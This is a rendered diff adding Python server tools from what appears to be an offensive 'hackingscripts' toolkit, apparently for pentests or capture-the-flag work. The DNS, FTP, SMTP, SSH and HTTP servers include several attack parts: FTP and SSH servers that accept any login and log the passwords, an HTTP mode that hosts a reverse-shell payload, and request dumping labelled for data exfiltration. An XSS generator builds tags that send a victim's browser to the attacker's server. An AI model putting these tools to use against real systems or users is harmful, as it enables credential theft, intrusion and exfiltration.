from dnslib import *
|
||||
except ImportError:
|
||||
print("Missing dependency dnslib: <https://pypi.python.org/pypi/dnslib>. Please install it with `pip`.")
|
||||
sys.exit(2)
|
||||
|
||||
|
||||
class DnsServer:
    """Minimal authoritative DNS server answering from an in-memory record table.

    Listens on UDP and TCP (same port). Records are registered with
    addEntry(); queries with no matching record can be delegated to
    not_found_handler(request, reply).
    """

    class BaseRequestHandler(socketserver.BaseRequestHandler):
        # Shared request flow; transport-specific I/O lives in subclasses.

        def get_data(self):
            raise NotImplementedError

        def send_data(self, data):
            raise NotImplementedError

        def handle(self):
            # self.server is the socketserver instance; its .server attribute
            # (set by UDPImpl/TCPImpl) is the owning DnsServer.
            try:
                data = self.get_data()
                self.send_data(self.server.server.dns_response(data))
            except Exception:
                traceback.print_exc(file=sys.stderr)

    class TCPReqImpl(BaseRequestHandler):
        # DNS over TCP: messages are prefixed with a 16-bit big-endian length.

        def get_data(self):
            data = self.request.recv(8192).strip()
            sz = struct.unpack('>H', data[:2])[0]
            if sz < len(data) - 2:
                raise Exception("Wrong size of TCP packet")
            elif sz > len(data) - 2:
                raise Exception("Too big TCP packet")
            return data[2:]

        def send_data(self, data):
            sz = struct.pack('>H', len(data))
            return self.request.sendall(sz + data)

    class UDPReqImpl(BaseRequestHandler):
        # DNS over UDP: self.request is (datagram, socket).

        def get_data(self):
            return self.request[0].strip()

        def send_data(self, data):
            return self.request[1].sendto(data, self.client_address)

    class UDPImpl(socketserver.ThreadingUDPServer):

        def __init__(self, server):
            super().__init__((server.bind_addr, server.listen_port), DnsServer.UDPReqImpl)
            self.server = server  # back-reference used by the request handlers

    class TCPImpl(socketserver.ThreadingTCPServer):

        def __init__(self, server):
            super().__init__((server.bind_addr, server.listen_port), DnsServer.TCPReqImpl)
            self.server = server  # back-reference used by the request handlers

    def __init__(self, addr, port=53):
        """Bind UDP and TCP listeners on (addr, port); call start[Background]() to serve."""
        self.bind_addr = addr
        self.listen_port = port
        self.sockets = []
        self.threads = []
        self.sockets.append(DnsServer.UDPImpl(self))
        self.sockets.append(DnsServer.TCPImpl(self))
        # record type -> {fully-qualified domain -> dnslib rdata}
        self.entries = { "A": {}, "AAAA": {}, "MX": {}, "TXT": {}, "NS": {} }
        self.debug = False
        self.ttl = 60 * 5
        self.logging = False
        self.not_found_handler = None  # optional callable(request, reply)

    def addEntry(self, type, domain, value):
        """Register a DNS record; returns True on success.

        :param type: record type, one of "A", "AAAA", "MX", "TXT", "NS"
        :param domain: record name; a trailing dot is appended if missing
        :param value: raw record payload (address, host name or text)
        """
        if type not in self.entries:
            print("Invalid type, must be one of:", self.entries.keys())
            return False

        if not domain.endswith("."):
            domain += "."

        # Wrap the raw value in the matching dnslib rdata class.
        # BUG FIX: MX/NS were wrapped in A() and TXT in CNAME(); since
        # dns_response() derives the answer rtype from the rdata class name,
        # those records were answered with the wrong record type.
        if type == "A":
            value = A(value)
        elif type == "AAAA":
            value = AAAA(value)
        elif type == "MX":
            value = MX(value)
        elif type == "NS":
            value = NS(value)
        elif type == "TXT":
            value = TXT(value)

        if self.debug:
            print(f"Added entry: {type} {domain} => {value}")

        self.entries[type][domain] = value
        return True

    def startBackground(self):
        """Start one serving thread per transport socket (non-blocking)."""
        for sock in self.sockets:
            t = threading.Thread(target=sock.serve_forever)
            t.start()
            self.threads.append(t)

    def start(self):
        """Start serving and block until all serving threads exit."""
        self.startBackground()
        # BUG FIX: map() is lazy and was never consumed, so join() never ran.
        for t in self.threads:
            t.join()

    def stop(self):
        """Shut down all transports and wait for the serving threads."""
        # BUG FIX: same lazy-map() issue as start() — shutdown/join never ran.
        for s in self.sockets:
            s.shutdown()
        for t in self.threads:
            t.join()

    def dns_response(self, data):
        """Parse a raw DNS query and return the packed response bytes."""
        request = DNSRecord.parse(data)

        if self.debug:
            print("DNS REQUEST:", request)

        reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
        qname = request.q.qname
        qn = str(qname)
        qtype = request.q.qtype
        qt = QTYPE[qtype]

        if qt in self.entries and qn in self.entries[qt]:
            entry = self.entries[qt][qn]
            # Answer rtype is taken from the rdata class registered in addEntry().
            rqt = entry.__class__.__name__
            reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=self.ttl, rdata=entry))
            if self.logging:
                print(f"Request: {qt} {qn} -> {entry}")
        elif self.not_found_handler:
            self.not_found_handler(request, reply)

        if self.debug:
            print("DNS RESPONSE:", reply)

        return reply.pack()
|
||||
181
tools/server/ftpserver.py
Executable file
181
tools/server/ftpserver.py
Executable file
@@ -0,0 +1,181 @@
|
||||
import os
|
||||
import logging
|
||||
import argparse
|
||||
import signal
|
||||
from pyftpdlib.handlers import FTPHandler
|
||||
from pyftpdlib.servers import ThreadedFTPServer
|
||||
from pyftpdlib.authorizers import DummyAuthorizer
|
||||
|
||||
# Configure the root logger to emit timestamped INFO messages on stderr;
# the handler classes below log every client action through it.
logger = logging.getLogger()
logger.setLevel(logging.INFO)

stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.INFO)

formatter = logging.Formatter("%(asctime)s - %(message)s")
stream_handler.setFormatter(formatter)

logger.addHandler(stream_handler)

# Banner strings shown to FTP clients on login and on quit.
MSG_LOGIN = "Login successful"
MSG_CLOSE = "Goodbye"
|
||||
|
||||
|
||||
# Class to log every action the user takes
class CustomFTPHandler(FTPHandler):
    """FTPHandler that logs every login, transfer and connection event.

    Consistency: all callbacks now use the module-level ``logger`` (the
    original mixed ``logging.*`` root-level calls and ``logger.*``; both
    reach the same root logger, so output is unchanged).
    """

    def on_login(self, username):
        logger.info(f"User '{username}' logged in successfully.")

    def on_login_failed(self, username, password):
        logger.warning(
            f"Failed login attempt for user '{username}' with password '{password}'."
        )

    def on_file_received(self, file):
        logger.info(f"File received: {file}")

    def on_file_sent(self, file):
        logger.info(f"File sent: {file}")

    def on_file_deleted(self, file):
        logger.info(f"File deleted: {file}")

    def on_file_renamed(self, old_file, new_file):
        logger.info(f"File renamed from '{old_file}' to '{new_file}'")

    def on_file_downloaded(self, file):
        logger.info(f"File downloaded: {file}")

    def on_file_stored(self, file):
        logger.info(f"File stored: {file}")

    def on_file_retrieved(self, file):
        logger.info(f"File retrieved: {file}")

    def on_file_aborted(self, file):
        logger.info(f"File transfer aborted: {file}")

    def on_file_changed(self, file):
        logger.info(f"File changed: {file}")

    def on_file_moved(self, old_file, new_file):
        logger.info(f"File moved from '{old_file}' to '{new_file}'")

    def on_file_uploaded(self, file):
        logger.info(f"File uploaded: {file}")

    def on_connect(self):
        logger.info(f"Client connected: {self.remote_ip}")

    def on_disconnect(self):
        logger.info(f"Client disconnected: {self.remote_ip}")

    def on_logout(self, username):
        logger.info(f"User logged out: {username}")

    def on_incomplete_file_received(self, file):
        logger.warning(f"Incomplete file received: {file}")

    def on_incomplete_file_sent(self, file):
        # BUG FIX: previously logged "Incomplete file received" (copy-paste).
        logger.warning(f"Incomplete file sent: {file}")
|
||||
|
||||
|
||||
class AnyUserAuthorizer(DummyAuthorizer):
    """
    Authorization class that allows any combination of username/password.

    Every attempted login is logged and accepted; unknown users are created
    on the fly with read/list permissions rooted at *directory*.
    """

    def __init__(self, directory):
        DummyAuthorizer.__init__(self)
        self.directory = directory
        # Template entry placed into user_table for users created implicitly
        # by has_perm(); "elr" = change dir, list, retrieve (read-only).
        self.default_params = {
            "pwd": "",
            "home": self.directory,
            "perm": "elr",
            "operms": {},
            "msg_login": MSG_LOGIN,
            "msg_quit": MSG_CLOSE,
        }

    def validate_authentication(self, username, password, handler):
        """Accept any credentials; log what was attempted."""
        logger.info(f"User '{username}' tried logging in with password: '{password}'")

        return True

    def get_home_dir(self, username):
        return self.directory

    def has_user(self, username):
        """Report every username as known, registering it on first sight."""
        if username in self.user_table:
            return True

        self.add_user(username, "", self.directory)
        return True

    def has_perm(self, username, perm, path=None) -> bool:
        """Grant every permission; register unknown users as a side effect."""
        if username not in self.user_table:
            # add user manually and not via add_user due to infinite recursion
            # BUG FIX: copy the template dict — sharing one dict instance
            # across all users would let per-user mutations leak to everyone.
            self.user_table[username] = dict(self.default_params)

        return True

    def get_msg_login(self, username: str) -> str:
        return MSG_LOGIN

    def get_msg_quit(self, username: str) -> str:
        return MSG_CLOSE
|
||||
|
||||
|
||||
class FastFTPServer:
    """Convenience wrapper: a threaded FTP server that accepts any credentials."""

    def __init__(self, directory, port):
        # directory: root directory served to every client
        # port: FTP control-channel port (21 needs root)
        self.directory = directory
        self.port = port
        self.server = None  # set in start()

    def start(self):
        """Wire up the allow-all authorizer and logging handler, then serve forever."""
        authorizer = AnyUserAuthorizer(directory=self.directory)

        handler = CustomFTPHandler
        # NOTE: authorizer is assigned on the handler *class* (pyftpdlib
        # convention), so it is shared by all connections.
        handler.authorizer = authorizer

        self.server = ThreadedFTPServer(("", self.port), handler)
        logging.info(f"Starting FTP server on port {self.port}")

        self.server.serve_forever()

    def cleanup(self):
        """Close all client connections and the listening socket."""
        logging.info("Shutting down FTP server...")
        if self.server:
            self.server.close_all()
        logging.info("FTP server shut down.")
|
||||
|
||||
|
||||
def signal_handler(sig, frame):
    """SIGINT handler: shut the module-global ftp_server down cleanly, then exit."""
    logging.info("Received Ctrl+C, shutting down...")
    ftp_server.cleanup()
    exit(0)
|
||||
|
||||
|
||||
def main():
    """Parse CLI options and run the catch-all FTP server until Ctrl+C."""
    parser = argparse.ArgumentParser(description="Temporary FTP Server")
    parser.add_argument(
        "--dir", "-d", type=str, default=".", help="Directory to serve files from"
    )
    parser.add_argument(
        "--port", "-p", type=int, default=21, help="Port to run the FTP server on"
    )

    args = parser.parse_args()

    if not os.path.exists(args.dir):
        print(f"Error: The directory '{args.dir}' does not exist.")
        return

    # signal_handler() needs to reach the server instance, hence the global.
    global ftp_server
    ftp_server = FastFTPServer(args.dir, args.port)
    signal.signal(signal.SIGINT, signal_handler)
    ftp_server.start()


if __name__ == "__main__":
    main()
|
||||
40
tools/server/smtpserver.py
Executable file
40
tools/server/smtpserver.py
Executable file
@@ -0,0 +1,40 @@
|
||||
import smtpd
|
||||
import email
|
||||
import asyncore
|
||||
import threading
|
||||
|
||||
class SMTPServer(smtpd.SMTPServer):
    """Catch-all SMTP sink that hands every received mail to an optional callback."""
    # NOTE(review): smtpd and asyncore were removed in Python 3.12 — this
    # class requires Python <= 3.11 (or third-party compatibility shims).

    def __init__(self, addr='0.0.0.0', port=25):
        super().__init__((addr, port), None)
        self.listen_thread = None  # background thread created by start_background()
        self.verbose = False       # print one line per incoming message
        self.on_message = None     # callable(peer, mailfrom, rcpttos, email.message.Message)
        self.is_running = True     # cleared by stop() to leave the serve loop

    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        """smtpd callback for each received message; parses it and dispatches to on_message."""
        if self.verbose:
            print(f"SMTP IN: {peer=} {mailfrom=} {rcpttos=} {len(data)} bytes, extra:", kwargs)
        if self.on_message and callable(self.on_message):
            mail = email.message_from_bytes(data)
            self.on_message(peer, mailfrom, rcpttos, mail)

    def start(self):
        """Run the asyncore loop in the current thread until stop() or Ctrl+C."""
        if self.verbose:
            print(f"SMTP server running on: {self._localaddr[0]}:{self._localaddr[1]}")
        try:
            while self.is_running:
                asyncore.loop(timeout=1, use_poll=True)
        except KeyboardInterrupt:
            self.close()

    def start_background(self):
        """Run start() in a background thread; returns the thread object."""
        self.listen_thread = threading.Thread(target=self.start)
        self.listen_thread.start()
        return self.listen_thread

    def stop(self):
        """Stop the loop, close the socket, and join the background thread (if any)."""
        self.is_running = False
        self.close()
        if self.listen_thread:
            self.listen_thread.join()
|
||||
90
tools/server/sshserver.py
Executable file
90
tools/server/sshserver.py
Executable file
@@ -0,0 +1,90 @@
|
||||
import socket
|
||||
import select
|
||||
import threading
|
||||
import paramiko
|
||||
|
||||
class ParamikoConnection(paramiko.ServerInterface):
    """paramiko server interface that accepts sessions and captures credentials.

    Authentication always succeeds unless the owning SSHServer's on_ssh_login
    hook decides otherwise — honeypot-style behavior.
    """

    def __init__(self, server):
        self.event = threading.Event()
        self.server = server  # owning SSHServer (provides the on_ssh_login hook)

    def check_channel_request(self, kind, chanid):
        """Allow only 'session' channels; reject everything else."""
        print("check_channel_request", kind, chanid)
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_auth_password(self, username, password):
        """Delegate to the on_ssh_login hook; otherwise log and accept any credentials."""
        if self.server.on_ssh_login:
            # Hook is expected to return a paramiko.AUTH_* constant.
            return self.server.on_ssh_login(username, password)

        print("check_auth_password", username, password)
        return paramiko.AUTH_SUCCESSFUL
|
||||
|
||||
class SSHServer:
    """Accept-everything SSH server built on paramiko, for credential capture.

    Incoming connections are wrapped in a paramiko Transport driven by
    ParamikoConnection, which accepts any password unless on_ssh_login vetoes.
    """

    def __init__(self, addr='0.0.0.0', port=22):
        self.server_address = addr
        self.listen_port = port
        self.listen_socket = None
        self.listen_thread = None
        self.client_sockets = []   # raw accepted sockets
        self.transports = []       # paramiko.Transport per connection
        self.verbose = True
        self.on_message = None
        self.is_running = True
        self.private_key = None    # host key; generated lazily in start()

        # hooks
        self.on_ssh_login = None   # optional callback(username, password) -> paramiko.AUTH_*

    def load_private_key_from_file(self, path):
        """Load the RSA host key from a PEM file instead of generating one."""
        with open(path, "r") as f:
            self.private_key = paramiko.RSAKey.from_private_key(f)

    def start(self):
        """Accept connections (blocking) until stop() is called."""
        if self.private_key is None:
            # No host key supplied: generate an ephemeral 2048-bit RSA key.
            self.private_key = paramiko.RSAKey.generate(2048)

        self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listen_socket.setblocking(False)
        self.listen_socket.bind((self.server_address, self.listen_port))
        self.listen_socket.listen()
        if self.verbose:
            print(f"SSH server running on: {self.server_address}:{self.listen_port}")
        try:
            while self.is_running:
                # BUG FIX: wait for readability instead of busy-spinning on the
                # non-blocking accept() (which pegged a CPU core); the 1s
                # timeout keeps the is_running flag responsive.
                readable, _, _ = select.select([self.listen_socket], [], [], 1.0)
                if not readable:
                    continue
                try:
                    client_socket, client_address = self.listen_socket.accept()
                except BlockingIOError:
                    # Connection vanished between select() and accept().
                    continue
                if self.verbose:
                    print("Incoming connection:", client_address)
                self.client_sockets.append(client_socket)
                transport = paramiko.Transport(client_socket)
                transport.add_server_key(self.private_key)
                paramiko_connection = ParamikoConnection(self)
                transport.start_server(server=paramiko_connection)
                self.transports.append(transport)
        finally:
            self.listen_socket.close()

    def start_background(self):
        """Run start() in a background thread; returns the thread object."""
        self.listen_thread = threading.Thread(target=self.start)
        self.listen_thread.start()
        return self.listen_thread

    def close(self):
        """Tear down the listener, all transports and all client sockets."""
        if self.listen_socket:
            try:
                self.listen_socket.shutdown(socket.SHUT_RDWR)
            except OSError:
                # BUG FIX: a listening socket that never accepted a connection
                # may refuse shutdown() (ENOTCONN) on some platforms.
                pass
        # BUG FIX: close the paramiko transports too, not just the raw sockets,
        # so their internal threads terminate.
        for transport in self.transports:
            transport.close()
        for sock in self.client_sockets:
            sock.close()

    def stop(self):
        """Signal the accept loop to exit, close everything, join the thread."""
        self.is_running = False
        self.close()
        if self.listen_thread:
            self.listen_thread.join()
|
||||
372
tools/server/webserver.py
Executable file
372
tools/server/webserver.py
Executable file
@@ -0,0 +1,372 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import argparse
|
||||
import threading
|
||||
import requests
|
||||
import time
|
||||
import os
|
||||
import ssl
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from urllib.parse import urlparse
|
||||
from hackingscripts.utils import util
|
||||
from hackingscripts.tools.server.xss_handler import generate_payload as generate_xss_payload
|
||||
|
||||
class FileServerRequestHandler(BaseHTTPRequestHandler):
    """Request handler for HttpFileServer: dispatches to registered routes,
    optionally dumps full requests, and can reverse-proxy to another host."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def do_HEAD(self):
        # HEAD/POST/OPTIONS all share the GET dispatch logic.
        self.do_GET()

    def do_POST(self):
        self.do_GET()

    def onForward(self, base_path, target, **kwargs):
        """Proxy the current request to `target`; returns (status, body, headers)."""
        path = self.path[max(0, len(base_path)-1):]
        parts = urlparse(target)
        if path.startswith(parts.path):
            path = path[len(parts.path):]

        target_rewrite = target + path

        content_length = self.headers.get('Content-Length')
        data = None
        if content_length and int(content_length) > 0:
            data = self.rfile.read(int(content_length))

        # Drop the original Host header so requests sets one for the target.
        if "Host" in self.headers:
            del self.headers["Host"]

        method = self.command
        print(target, "=>", method, target_rewrite)
        res = requests.request(method, target_rewrite, headers=self.headers, data=data, **kwargs)
        return res.status_code, res.content, res.headers

    def read_body(self):
        """Read and cache the request body; None when no body was sent."""
        if not hasattr(self, "body"):
            content_length = self.headers.get('Content-Length')
            if content_length and int(content_length) > 0:
                self.body = self.rfile.read(int(content_length))
            else:
                self.body = None

        return self.body

    def find_route(self, path):
        """Return the handler for `path`: exact routes first, then prefix routes,
        else a 404 fallback."""
        if path in self.server.routes:
            return self.server.routes[path]

        for p, route in self.server.prefix_routes.items():
            if path.startswith(p):
                return route

        def not_found(req):
            return 404, b"", {}

        return not_found

    def _normalize_result(self, result):
        """Map a route's return value onto (status_code, data, headers).

        Routes may return a (status[, data[, headers]]) tuple, a bare status
        int, None (-> 201 empty), or any other value (-> 200 with the value
        serialized as the body).
        """
        if isinstance(result, tuple):
            status_code = 200 if len(result) < 1 else result[0]
            data = b"" if len(result) < 2 else result[1]
            headers = {} if len(result) < 3 else result[2]
        elif isinstance(result, int):
            status_code = result
            data = b""
            headers = {}
        elif result is None:
            status_code = 201
            data = b""
            headers = {}
        else:
            # BUG FIX: the original referenced an unbound name `data` here
            # (NameError for any route returning a plain value); it must
            # serialize `result`.
            status_code = 200
            data = result if type(result) in [bytes, bytearray] else str(result).encode()
            headers = {}
        return status_code, data, headers

    def do_GET(self):
        """Dispatch the request to its route and write the response."""
        try:
            # During shutdown, answer trivially so pending requests drain.
            if not self.server.is_running:
                self.send_response(200)
                self.end_headers()
                return

            path = self.server.cleanPath(self.path)
            route = self.find_route(path)
            result = route(self)

            # Hop-by-hop / length headers we always compute ourselves.
            blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]
            status_code, data, headers = self._normalize_result(result)

            if path in self.server.dumpRequests:
                headers["Access-Control-Allow-Origin"] = "*"

            headers["Connection"] = "Close"
            headers["Content-Length"] = len(util.nvl(data, b""))

            if len(headers) == 0:
                self.send_response(status_code)
            else:
                # /dummy is a probe endpoint: keep it out of the request log.
                if path != "/dummy":
                    self.log_request(status_code)
                self.send_response_only(status_code)

            for key, value in headers.items():
                if key.lower() not in blacklist_headers:
                    self.send_header(key, value)

            if self.command.upper() == "OPTIONS":
                self.send_header("Allow", "OPTIONS, GET, HEAD, POST")

            self.end_headers()

            # HEAD/OPTIONS responses carry headers only, never a body.
            if data and self.command.upper() not in ["HEAD", "OPTIONS"]:
                if isinstance(data, str):
                    data = data.encode()
                self.wfile.write(data)

            if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
                body = self.read_body()

                print("===== Connection from:", self.client_address[0])
                print("%s %s %s" % (self.command, self.path, self.request_version))
                print(str(self.headers).strip())
                if body:
                    print()
                    print(body)
                print("==========")
        except Exception as e:
            print("Exception on handling http", str(e))
            # Bare raise preserves the original traceback.
            raise

    def log_message(self, format, *args):
        # Silent by default; HttpFileServer.enableLogging() turns this on.
        if self.server.logRequests:
            super().log_message(format, *args)
|
||||
|
||||
class HttpFileServer(HTTPServer):
    """In-memory HTTP(S) server for quickly hosting payloads, dumping requests
    and reverse-proxying — routes are plain callables keyed by path."""

    def __init__(self, addr, port):
        super().__init__((addr, port), FileServerRequestHandler)
        self.ssl_context = None      # set by enableSSL()
        self.logRequests = False
        self.routes = {}             # exact path -> handler(request)
        self.dumpRequests = []       # paths whose full requests are printed
        self.prefix_routes = {}      # path prefix -> handler(request)
        self.is_running = True
        self.listen_thread = None

    def cleanPath(self, path):
        """Strip the query string and guarantee a single leading slash."""
        if "?" in path:
            path = path[0:path.find("?")]

        if not path.startswith("/"):
            path = "/" + path

        return path.strip()

    def addFile(self, name, data, mime_type=None):
        """Serve `data` (str, bytes or file-like) at `name` with permissive CORS."""
        assert isinstance(name, str)
        assert data is not None

        # File-like input is read once and closed immediately.
        if hasattr(data, "read"):
            fd = data
            data = data.read()
            fd.close()

        if isinstance(data, str):
            data = data.encode("UTF-8")

        headers = {
            "Access-Control-Allow-Origin": "*"
        }

        if mime_type:
            headers["Content-Type"] = mime_type

        # return 200 - OK and data
        self.addRoute(name, lambda req: (200, data, headers))

    def add_file_path(self, path, name=None):
        """Serve a file from disk, re-reading it on every request."""
        def readfile():
            with open(path, "rb") as f:
                return f.read()

        if name is None:
            name = os.path.basename(path)
        self.addRoute(name, lambda req: (200, readfile()))

    def load_directory(self, path, recursive=True, exclude_ext=None):
        """Register every file under `path`, skipping `exclude_ext` suffixes.

        BUG FIX: `exclude_ext` had a mutable default ([]); `recursive` was
        accepted but ignored — it now limits the walk to the top directory.
        """
        if not os.path.isdir(path):
            print("Not a directory:", path)
            return

        for dp, dn, filenames in os.walk(path):
            for f in filenames:
                file_path = os.path.join(dp, f)
                if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
                    relative_path = file_path[len(path):]
                    self.add_file_path(file_path, relative_path)
            if not recursive:
                break

    def dumpRequest(self, name):
        """Print full request details for this path (handled in the request handler)."""
        self.dumpRequests.append(self.cleanPath(name))

    def addRoute(self, path, func):
        self.routes[self.cleanPath(path)] = func

    def addPrefixRoute(self, path, func):
        self.prefix_routes[self.cleanPath(path)] = func

    def forwardRequest(self, path, target, **kwargs):
        """Reverse-proxy everything under `path` to `target`."""
        self.addPrefixRoute(path, lambda req: req.onForward(path, target, **kwargs))

    def enableLogging(self):
        self.logRequests = True

    def enableSSL(self, private_key="private.key", certificate="server.crt"):
        """Wrap the listening socket in TLS, generating key/cert via openssl if missing."""
        if not os.path.isfile(private_key):
            print("Generating private key and certificate…")
            os.system(f"openssl req -new -x509 -keyout {private_key} -out {certificate} -days 365 -nodes")
        elif not os.path.isfile(certificate):
            print("Generating certificate…")
            # BUG FIX: "-keyin" is not an openssl option; "-key" reuses the
            # existing private key for the new certificate.
            os.system(f"openssl req -new -x509 -key {private_key} -out {certificate} -days 365 -nodes")

        self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        self.ssl_context.load_cert_chain(certificate, private_key)
        self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)

    def startBackground(self):
        """Serve in a background thread; returns the thread object."""
        self.listen_thread = threading.Thread(target=self.serve_forever)
        self.listen_thread.start()
        return self.listen_thread

    def get_base_url(self, ip_addr=None):
        """Return e.g. "http://1.2.3.4:9000", substituting `ip_addr` when given."""
        addr, port = self.server_address

        if ip_addr is not None:
            addr = ip_addr

        protocol = "https" if isinstance(self.socket, ssl.SSLSocket) else "http"
        # Omit the port for protocol defaults (80/443).
        if (int(port) == 80 and protocol == "http") or (int(port) == 443 and protocol == "https"):
            port = ""
        else:
            port = f":{port}"

        return f"{protocol}://{addr}{port}"

    def get_full_url(self, uri, ip_addr=None):
        if not uri.startswith("/"):
            uri = "/" + uri
        return self.get_base_url(ip_addr) + uri

    def stop(self):
        """Stop serving; safe to call from a request handler or another thread."""
        self.is_running = False
        time.sleep(1)
        self.shutdown()
        # BUG FIX: threading.currentThread() was removed in Python 3.12, and
        # listen_thread is None when serve_forever() ran on the caller's
        # thread — the original crashed with None.join() in that case.
        if self.listen_thread and self.listen_thread is not threading.current_thread():
            self.listen_thread.join()
|
||||
|
||||
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Spawn a temporary http server")
    parser.add_argument(
        "action",
        choices=["shell", "dump", "proxy", "xss", "start"],
        help="Choose one of these actions: shell, dump, proxy, xss, start"
    )

    parser.add_argument(
        "--bind-address",
        type=str,
        default="0.0.0.0",
        dest="bind_addr",
        help="Address to bind on (default: 0.0.0.0)"
    )

    parser.add_argument(
        "--port",
        type=int,
        default=9000,
        help="Port to bind on (default: 9000)"
    )

    parser.add_argument(
        "--payload",
        type=str,
        default=None,
        help="Payload for xss / shell"
    )

    parser.add_argument(
        "--ssl",
        action="store_true",
        default=False,
        help="Use HTTPS instead of HTTP"
    )

    parser.add_argument(
        "--ssl-cert",
        dest="ssl_cert",
        type=str,
        default="server.crt",
        help="The certificate to use in combination with --ssl, default: server.crt"
    )

    parser.add_argument(
        "--ssl-key",
        dest="ssl_key",
        type=str,
        default="private.key",
        help="The private key to use in combination with --ssl, default: private.key"
    )

    parser.add_argument(
        "-v",
        "--verbose",
        action="store_true",
        default=False,
        help="Verbose mode"
    )

    args = parser.parse_args()

    file_server = HttpFileServer(args.bind_addr, args.port)
    ip_address = util.get_address()

    if args.ssl:
        file_server.enableSSL(args.ssl_key, args.ssl_cert)

    if args.verbose:
        file_server.enableLogging()

    if args.action == "shell":
        payload_type = args.payload if args.payload else "bash"
        # NOTE(review): `rev_shell` is not imported in this module — confirm the
        # intended import (e.g. `from hackingscripts import rev_shell`).
        # BUG FIX: pass the resolved payload_type (was args.payload, which can
        # be None despite the "bash" fallback computed just above) and serve
        # the generated payload string (was the rev_shell module object).
        shell_payload = rev_shell.generate_payload(payload_type, ip_address, 4444)
        file_server.addFile("/shell", shell_payload)
        print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
    elif args.action == "dump":
        file_server.dumpRequest("/")
        print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
    elif args.action == "proxy":
        url = "https://google.com"
        file_server.forwardRequest("/proxy", url)
        print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
    elif args.action == "xss":
        payload_type = args.payload if args.payload else "img"
        xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address))
        file_server.addFile("/xss", xss)
        file_server.dumpRequest("/exfiltrate")
        print("Exfiltrate data using:")
        print(xss)
    elif args.action == "start":
        file_server.load_directory(".")
        print("Serve files in current directory using:")
        print(file_server.get_full_url("/", ip_addr=ip_address))

    file_server.serve_forever()
|
||||
71
tools/server/xss_handler.py
Executable file
71
tools/server/xss_handler.py
Executable file
@@ -0,0 +1,71 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from hackingscripts import util
|
||||
from fileserver import HttpFileServer
|
||||
import argparse
|
||||
import random
|
||||
|
||||
def generate_payload(payload_type, url, index=None, **kwargs):
    """Build one or more XSS payload snippets that redirect the victim to `url`.

    Returns the payloads joined by newlines, or None for an unknown type.
    `index` and extra kwargs are accepted for interface compatibility but are
    currently unused.
    """
    payloads = []

    # Tags whose onerror handler fires on a bogus src, redirecting the browser.
    media_tags = ["img", "audio", "video", "image", "body", "script", "object"]
    if payload_type in media_tags:
        # BUG FIX: the URL must be a quoted JS string literal — an unquoted
        # URL is a JavaScript syntax error inside the onerror handler.
        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=\'%s\'">' % (payload_type, url))

    if payload_type == "script":
        # BUG FIX: same quoting issue as above.
        payloads.append("<script type=\"text/javascript\">document.location='%s'</script>" % url)
        payloads.append('<script src="%s/xss" />' % url)

    if len(payloads) == 0:
        return None

    return "\n".join(payloads)
|
||||
|
||||
if __name__ == "__main__":
    # BUG FIX: `re` is used below but was never imported in this module.
    import re

    parser = argparse.ArgumentParser(description="XSS payload generator")
    parser.add_argument(dest="type", type=str, default=None, help="Payload type")
    parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
    parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
    args, extra = parser.parse_known_args()

    listen_port = args.port
    payload_type = args.type.lower()
    local_address = args.addr
    extra_args = {}

    # Trailing key=value arguments become generate_payload kwargs.
    for entry in extra:
        match = re.match(r"(\w+)=(\w+)", entry)
        if not match:
            print("Invalid extra argument:", entry)
            # BUG FIX: signal failure to the shell (was exit() -> status 0).
            exit(1)
        key, value = match.groups()
        extra_args[key] = value

    # choose random port
    if listen_port is None:
        listen_port = random.randint(10000, 65535)
        while util.is_port_in_use(listen_port):
            listen_port = random.randint(10000, 65535)

    http_server = HttpFileServer(local_address, listen_port)
    url = http_server.get_full_url("/", util.get_address())
    payload = generate_payload(payload_type, url, **extra_args)
    if payload is None:
        print("Unknown payload type: %s" % payload_type)
        # print("Supported types: ")
        exit(1)

    print(f"---PAYLOAD---\n{payload}\n---PAYLOAD---\n")

    # Permissive CORS so the payload can exfiltrate from any origin.
    headers = {
        "Access-Control-Allow-Origin": "*",
        "Access-Control-Allow-Methods": "GET, POST, OPTIONS"
    }

    http_server.addRoute("/", lambda req: (201, b"", headers))
    http_server.dumpRequest("/")
    http_server.serve_forever()
|
||||
|
||||
|
||||
Reference in New Issue
Block a user